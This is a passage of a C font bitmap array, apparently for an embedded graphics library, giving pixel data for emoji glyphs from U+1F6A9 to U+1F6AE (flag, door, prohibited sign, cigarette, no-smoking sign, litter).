0xc3, 0xe0, 0x3, 0xc7, 0xff, 0x7, 0xc1, 0xff,
0xc7, 0x80, 0x1c, 0xff, 0xf8, 0x7f, 0xf, 0xff,
0x9c, 0x0, 0xff, 0xff, 0xc3, 0xf8, 0x7f, 0xff,
0xe0, 0x7, 0xff, 0xfc, 0x3f, 0xe1, 0xff, 0xff,
0x0, 0x3f, 0xff, 0xe3, 0xff, 0x8f, 0xff, 0xf8,
0x1, 0xff, 0xff, 0x1f, 0xfc, 0x7f, 0xff, 0xc0,
0xf, 0xff, 0xf9, 0xff, 0xf3, 0xff, 0xfe, 0x0,
0x7f, 0xff, 0x8f, 0xff, 0x8f, 0xff, 0xf0, 0x7,
0xff, 0xfc, 0xff, 0xfe, 0x7f, 0xff, 0xc0, 0xff,
0xff, 0xe7, 0xff, 0xf3, 0xff, 0xff, 0x87, 0xff,
0xfe, 0x7f, 0xff, 0xcf, 0xff, 0xfc, 0x37, 0xff,
0xf7, 0xff, 0xff, 0x7f, 0xff, 0x63, 0x8f, 0xff,
0xbf, 0xff, 0xfb, 0xff, 0xe3, 0x9c, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xfc, 0x1c, 0xe0, 0x7, 0xff,
0xff, 0xff, 0xfc, 0x0, 0xe6, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3, 0x30, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x19, 0x80, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xdc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1, 0xdc, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0xc1, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x3,
0xfc, 0x1, 0xff, 0xf0, 0x0, 0x0, 0x1f, 0xff,
0x0, 0x0, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0x0, 0x7, 0xff, 0xff, 0xfc, 0x0, 0x0,
/* U+1F6A9 "🚩" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe0, 0xf, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe1, 0xff, 0xfe, 0x0, 0x0, 0x0, 0x0, 0x0,
0xff, 0xff, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0xff, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x1f, 0xf0,
0xf0, 0x0, 0x0, 0xf0, 0x0, 0x0, 0xff, 0xfe,
0xe0, 0x0, 0x0, 0x78, 0x0, 0x3, 0xe0, 0x7c,
0xe0, 0x0, 0x0, 0x1c, 0x0, 0x7, 0x81, 0xf0,
0xf0, 0x0, 0x0, 0xf, 0x0, 0x1e, 0x3, 0xc0,
0x70, 0x0, 0x0, 0x7, 0xc0, 0xf8, 0x7, 0x80,
0x70, 0x0, 0x0, 0x1, 0xff, 0xe0, 0xf, 0x0,
0x70, 0x0, 0x0, 0x0, 0x7f, 0x0, 0x1c, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0,
0x70, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x1, 0xc0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x3, 0x80, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x7, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0xf, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x1e, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x38, 0x0, 0x0, 0x0, 0x0, 0xf0, 0x0, 0x0,
0x3c, 0x0, 0x0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x7, 0x80, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x1f, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x0, 0x7f, 0x80, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x7, 0xfc, 0x0, 0x0, 0x0, 0x0,
0xe, 0x0, 0x3f, 0xe0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x1, 0xff, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x7, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x1f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0x7c, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xe, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0xf, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
/* U+1F6AA "🚪" */
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xf8, 0x0, 0x0, 0x0, 0xf, 0xc0, 0x0,
0x0, 0x0, 0x7e, 0x0, 0x0, 0x0, 0x3, 0xf0,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x0,
0xfc, 0x1f, 0xff, 0xff, 0x87, 0xe0, 0xff, 0xff,
0xfc, 0x3f, 0x6, 0x0, 0x0, 0x61, 0xf8, 0x30,
0x0, 0x3, 0xf, 0xc1, 0x80, 0x0, 0x18, 0x7e,
0xc, 0x0, 0x0, 0xc3, 0xf0, 0x60, 0x0, 0x6,
0x1f, 0x83, 0x0, 0x0, 0x30, 0xfc, 0x18, 0x0,
0x1, 0x87, 0xe0, 0xc0, 0x0, 0xc, 0x3f, 0x6,
0x0, 0x0, 0x61, 0xf8, 0x30, 0x0, 0x3, 0xf,
0xc1, 0x80, 0x0, 0x18, 0x7e, 0xc, 0x0, 0x0,
0xc3, 0xf0, 0x60, 0x0, 0x6, 0x1f, 0x83, 0x0,
0x0, 0x30, 0xfc, 0x18, 0x0, 0x1, 0x87, 0xe0,
0xc0, 0x0, 0xc, 0x3f, 0x6, 0x0, 0x0, 0x61,
0xf8, 0x3f, 0xff, 0xff, 0xf, 0xc1, 0xff, 0xff,
0xf8, 0x7e, 0x0, 0x0, 0x0, 0x3, 0xf0, 0x0,
0x0, 0x0, 0x1f, 0x86, 0x0, 0x0, 0x0, 0xfc,
0x78, 0x0, 0x0, 0x7, 0xe3, 0xc0, 0x0, 0x0,
0x3f, 0x1e, 0x0, 0x0, 0x1, 0xf8, 0xe0, 0x0,
0x0, 0xf, 0xc0, 0x0, 0x0, 0x0, 0x7e, 0x0,
0x0, 0x0, 0x3, 0xf0, 0x7f, 0xff, 0xfe, 0x1f,
0x83, 0xff, 0xff, 0xf0, 0xfc, 0x18, 0x0, 0x1,
0x87, 0xe0, 0xc0, 0x0, 0xc, 0x3f, 0x6, 0x0,
0x0, 0x61, 0xf8, 0x30, 0x0, 0x3, 0xf, 0xc1,
0x80, 0x0, 0x18, 0x7e, 0xc, 0x0, 0x0, 0xc3,
0xf0, 0x60, 0x0, 0x6, 0x1f, 0x83, 0x0, 0x0,
0x30, 0xfc, 0x18, 0x0, 0x1, 0x87, 0xe0, 0xc0,
0x0, 0xc, 0x3f, 0x6, 0x0, 0x0, 0x61, 0xf8,
0x30, 0x0, 0x3, 0xf, 0xc1, 0x80, 0x0, 0x18,
0x7e, 0xc, 0x0, 0x0, 0xc3, 0xf0, 0x60, 0x0,
0x6, 0x1f, 0x83, 0x0, 0x0, 0x30, 0xfc, 0x18,
0x0, 0x1, 0x87, 0xe0, 0xff, 0xff, 0xfc, 0x3f,
0x7, 0xff, 0xff, 0xe1, 0xf8, 0x0, 0x0, 0x0,
0xf, 0xc0, 0x0, 0x0, 0x0, 0x7e, 0x0, 0x0,
0x0, 0x3, 0xf0, 0x0, 0x0, 0x0, 0x1f, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
/* U+1F6AB "🚫" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x0,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x0,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xc0,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xf0,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1c,
0x0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x1f, 0xc0, 0x0, 0x0, 0x0, 0x0,
0x70, 0x0, 0x1c, 0xf0, 0x0, 0x0, 0x0, 0x0,
0x1c, 0x0, 0x1c, 0x3c, 0x0, 0x0, 0x0, 0x0,
0x7, 0x0, 0x1e, 0xf, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0xe, 0x3, 0xc0, 0x0, 0x0, 0x0,
0x0, 0xe0, 0xe, 0x0, 0xf0, 0x0, 0x0, 0x0,
0x0, 0x38, 0x7, 0x0, 0x3c, 0x0, 0x0, 0x0,
0x0, 0x1c, 0x7, 0x0, 0xf, 0x0, 0x0, 0x0,
0x0, 0x7, 0x3, 0x80, 0x3, 0xc0, 0x0, 0x0,
0x0, 0x3, 0x83, 0x80, 0x0, 0xf0, 0x0, 0x0,
0x0, 0x0, 0xe1, 0xc0, 0x0, 0x7c, 0x0, 0x0,
0x0, 0x0, 0x71, 0xc0, 0x0, 0x1f, 0x0, 0x0,
0x0, 0x0, 0x3c, 0xe0, 0x0, 0x7, 0xc0, 0x0,
0x0, 0x0, 0xe, 0x70, 0x0, 0x1, 0xf0, 0x0,
0x0, 0x0, 0x7, 0x38, 0x0, 0x0, 0x7c, 0x0,
0x0, 0x0, 0x3, 0xb8, 0x0, 0x0, 0x1f, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x7, 0xc0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x1, 0xf0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x0, 0x1f, 0x80, 0x0, 0x0, 0x1e,
0x0, 0x0, 0x0, 0xf, 0xc0, 0x0, 0x0, 0x7,
0x80, 0x0, 0x0, 0x7, 0xe0, 0x0, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x78, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x0, 0x0,
0x1e, 0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x0,
0x7, 0x80, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x0,
0x1, 0xe0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x78, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x1e, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x7, 0x80, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x1, 0xe0, 0x0, 0x7, 0x38, 0x0, 0x0,
0x0, 0x0, 0x78, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x1e, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x7, 0x80, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x1, 0xe0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x78, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x1e, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x7, 0x80, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x7, 0xb8, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x7c, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x80, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F6AC "🚬" */
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x2, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x3, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x1, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0xde, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6f, 0x80, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x63, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x31, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x18, 0xff, 0x80, 0x0, 0x0, 0x0, 0x0,
0x0, 0xc, 0x33, 0xfc, 0x0, 0x0, 0x0, 0x0,
0x0, 0x6, 0x1c, 0xff, 0xff, 0xff, 0x80, 0x0,
0x0, 0x3, 0x7, 0x7, 0xff, 0xff, 0xfe, 0x0,
0x0, 0x1, 0x81, 0xc0, 0x0, 0x0, 0x1f, 0xe0,
0x0, 0x0, 0xc0, 0x78, 0x0, 0x0, 0x0, 0x7c,
0x0, 0x0, 0x70, 0xf, 0x80, 0x0, 0x0, 0x7,
0x80, 0x0, 0x18, 0x1, 0xfc, 0x0, 0x0, 0x0,
0xe0, 0x0, 0xc, 0x0, 0x3f, 0xf8, 0x0, 0x0,
0x38, 0x0, 0x7, 0x0, 0x1, 0xff, 0xf0, 0x0,
0xe, 0x0, 0x1, 0xc0, 0x0, 0x3, 0xff, 0x80,
0x3, 0x0, 0x0, 0xf0, 0x0, 0x0, 0x7, 0xf8,
0x1, 0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x3f,
0x0, 0x60, 0x0, 0xf, 0x80, 0x0, 0x0, 0x3,
0xe0, 0x30, 0x0, 0x3, 0xf0, 0x0, 0x0, 0x0,
0x78, 0x18, 0x0, 0x0, 0x7f, 0x80, 0x0, 0x0,
0xe, 0xc, 0x0, 0x0, 0x1f, 0xff, 0x80, 0x0,
0x3, 0x6, 0x0, 0x0, 0x3, 0xff, 0xff, 0x0,
0x1, 0xc3, 0x0, 0x0, 0x0, 0x1f, 0xff, 0xf0,
0x0, 0x61, 0x80, 0x0, 0x0, 0x0, 0x7, 0xfe,
0x0, 0x31, 0x80, 0x0, 0x0, 0x0, 0x0, 0xef,
0xc0, 0x18, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x30,
0xe0, 0xc, 0xc0, 0x0, 0x0, 0x0, 0x0, 0x18,
0x38, 0xc, 0xe0, 0x0, 0x0, 0x0, 0x0, 0x1c,
0xc, 0x6, 0x60, 0x0, 0x0, 0x0, 0x0, 0x7c,
0x6, 0x6, 0xe0, 0x0, 0x0, 0x0, 0x3, 0xf8,
0x3, 0x6, 0xe0, 0x0, 0x0, 0x0, 0xf, 0xf0,
0x3, 0x7, 0xc0, 0x0, 0x0, 0x0, 0x3f, 0xc0,
0x7, 0x7, 0xc0, 0x0, 0x0, 0x0, 0x7f, 0x0,
0x7, 0xf, 0x80, 0x0, 0x0, 0x0, 0x7c, 0x0,
0x1e, 0x7e, 0x0, 0x0, 0x0, 0x0, 0x70, 0x0,
0x7f, 0xf8, 0x0, 0x0, 0x0, 0x0, 0x70, 0x3,
0xff, 0x80, 0x0, 0x0, 0x0, 0x0, 0x70, 0xf,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x0, 0x30, 0x7f,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x33, 0xf0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x1f, 0x80,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xe, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf1, 0xff,
0xe0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xf8, 0xcf,
0xf8, 0x0, 0x0, 0x0, 0x0, 0x3f, 0xfe, 0x66,
0xfe, 0x0, 0x0, 0x0, 0x0, 0x1f, 0xff, 0x3e,
0x3f, 0x0, 0x0, 0x0, 0x0, 0xf, 0xff, 0xbf,
0xff, 0x80, 0x0, 0x0, 0x0, 0x3, 0xff, 0xde,
0xff, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xee,
0x7f, 0xc0, 0x0, 0x0, 0x0, 0x1, 0xff, 0xf3,
0xff, 0xe0, 0x0, 0x0, 0x0, 0x0, 0xff, 0xf9,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xfc,
0xff, 0xf0, 0x0, 0x0, 0x0, 0x0, 0x7f, 0xfc,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x3, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe,
0x0,
/* U+1F6AD "🚭" */
0x0, 0x0, 0x0, 0x1f, 0xfc, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0xff, 0xff, 0xe0, 0x0, 0x1e,
0x0, 0x0, 0x3, 0xf8, 0x0, 0xfe, 0x0, 0x3c,
0x0, 0x0, 0x7, 0xc0, 0x0, 0x7, 0xc0, 0x3c,
0x0, 0x0, 0xf, 0x80, 0x0, 0x0, 0xf8, 0x3e,
0x0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x1f, 0x1f,
0x0, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x3, 0xdf,
0x80, 0x0, 0x1e, 0x0, 0x0, 0x0, 0x0, 0xff,
0x80, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x1f,
0xc0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x7,
0xe0, 0x0, 0x3c, 0x0, 0x0, 0x0, 0x0, 0x3,
0xf0, 0x0, 0x1f, 0x0, 0x0, 0x0, 0x0, 0x1,
0xf8, 0x0, 0x1d, 0xc0, 0x0, 0x0, 0x0, 0x0,
0xfc, 0x0, 0x1c, 0x70, 0x0, 0x0, 0x0, 0x0,
0x7f, 0x0, 0x1e, 0x1c, 0x0, 0x0, 0x0, 0x0,
0x3f, 0xc0, 0xe, 0x7, 0x0, 0x0, 0x0, 0x0,
0x1f, 0xe0, 0xe, 0x1, 0xc0, 0x0, 0x0, 0x0,
0xf, 0xf8, 0x7, 0x0, 0x70, 0x0, 0x0, 0x0,
0x7, 0xfc, 0x7, 0x0, 0x1c, 0x0, 0x0, 0x0,
0x3, 0xf7, 0x3, 0x80, 0x7, 0x0, 0x0, 0x0,
0x1, 0xf3, 0x83, 0x80, 0x1, 0xc0, 0x0, 0x0,
0x0, 0xf8, 0xe1, 0xc0, 0x0, 0x70, 0x0, 0x0,
0x0, 0x78, 0x71, 0xc0, 0x0, 0x1c, 0x0, 0x0,
0x0, 0x78, 0x3c, 0xe0, 0x0, 0x7, 0x0, 0x0,
0x0, 0x38, 0xe, 0x70, 0x0, 0x1, 0xc0, 0x0,
0x0, 0x78, 0x7, 0x38, 0x0, 0x0, 0x70, 0x0,
0x0, 0x60, 0x3, 0xb8, 0x0, 0x0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0xfc, 0x0, 0x0, 0x7, 0x0,
0x0, 0x0, 0x0, 0x7e, 0x0, 0x0, 0x1, 0xc0,
0x0, 0x0, 0x0, 0x3f, 0x0, 0xff, 0xff, 0xff,
0xff, 0xc7, 0xe0, 0x1f, 0x80, 0x7f, 0xff, 0xff,
0xff, 0xe3, 0xf0, 0xf, 0xc0, 0x3f, 0xff, 0xff,
0xff, 0xf1, 0xf8, 0x7, 0xe0, 0x1f, 0xff, 0xff,
0xff, 0xf8, 0xfc, 0x3, 0xf0, 0xf, 0xff, 0xff,
0xff, 0xfc, 0x7e, 0x1, 0xf8, 0x7, 0xff, 0xff,
0xff, 0xfe, 0x3f, 0x0, 0xfc, 0x3, 0xff, 0xff,
0xff, 0xff, 0x1f, 0x80, 0x7e, 0x0, 0x0, 0x0,
0x1, 0xc0, 0x0, 0x0, 0x3f, 0x0, 0x0, 0x0,
0x0, 0x70, 0x0, 0x0, 0x3d, 0xc0, 0x0, 0x0,
0x0, 0x1c, 0x0, 0x0, 0x1c, 0xe0, 0x0, 0x0,
0x0, 0x7, 0x0, 0x0, 0xe, 0x70, 0x0, 0x0,
0x0, 0x1, 0xc0, 0x0, 0x7, 0x3c, 0x0, 0x0,
0x0, 0x0, 0x70, 0x0, 0x7, 0x8e, 0x0, 0x0,
0x0, 0x0, 0x1c, 0x0, 0x3, 0x87, 0x0, 0x0,
0x0, 0x0, 0x7, 0x0, 0x1, 0xc1, 0xc0, 0x0,
0x0, 0x0, 0x1, 0xc0, 0x1, 0xc0, 0xe0, 0x0,
0x0, 0x0, 0x0, 0x70, 0x0, 0xe0, 0x38, 0x0,
0x0, 0x0, 0x0, 0x1c, 0x0, 0xe0, 0x1c, 0x0,
0x0, 0x0, 0x0, 0x7, 0x0, 0x70, 0x7, 0x0,
0x0, 0x0, 0x0, 0x1, 0xe0, 0x70, 0x3, 0xc0,
0x0, 0x0, 0x0, 0x0, 0x78, 0x78, 0x0, 0xe0,
0x0, 0x0, 0x0, 0x0, 0x1e, 0x38, 0x0, 0x38,
0x0, 0x0, 0x0, 0x0, 0x7, 0xb8, 0x0, 0xe,
0x0, 0x0, 0x0, 0x0, 0x1, 0xf8, 0x0, 0x7,
0x80, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x1,
0xe0, 0x0, 0x0, 0x0, 0x0, 0x3c, 0x0, 0x0,
0x78, 0x0, 0x0, 0x0, 0x0, 0x38, 0x0, 0x0,
0xf, 0x0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x3, 0xc0, 0x0, 0x0, 0x0, 0x78, 0x0, 0x0,
0x0, 0xf8, 0x0, 0x0, 0x0, 0xf8, 0x0, 0x0,
0x0, 0x1f, 0x0, 0x0, 0x1, 0xf0, 0x0, 0x0,
0x0, 0x3, 0xe0, 0x0, 0x3, 0xe0, 0x0, 0x0,
0x0, 0x0, 0x7f, 0x0, 0x1f, 0xc0, 0x0, 0x0,
0x0, 0x0, 0x7, 0xff, 0xff, 0x0, 0x0, 0x0,
0x0, 0x0, 0x0, 0x3f, 0xf8, 0x0, 0x0, 0x0,
/* U+1F6AE "🚮" */
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfc,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xdf, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x7, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x1, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x7f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x0, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80, 0x1f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0, 0xf,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x7,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x3,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x83,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xe0,
0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xc0,
0x0, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0x1f, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0x7, 0xff, 0xff, 0xff, 0xff, 0xff, 0x80,
0x0, 0x3, 0xff, 0xff, 0xff, 0xff, 0x80, 0x3,
0x0, 0x11, 0xff, 0xff, 0xff, 0xff, 0xc0, 0x3,
0x80, 0x8, 0x7f, 0xff, 0xff, 0xff, 0xe0, 0x3,
0xc0, 0x6, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff,
0xe0, 0x3, 0xf, 0xff, 0xff, 0xff, 0xff, 0xff,
0xf0, 0x1, 0x87, 0xff, 0xff, 0xff, 0xff, 0xff,
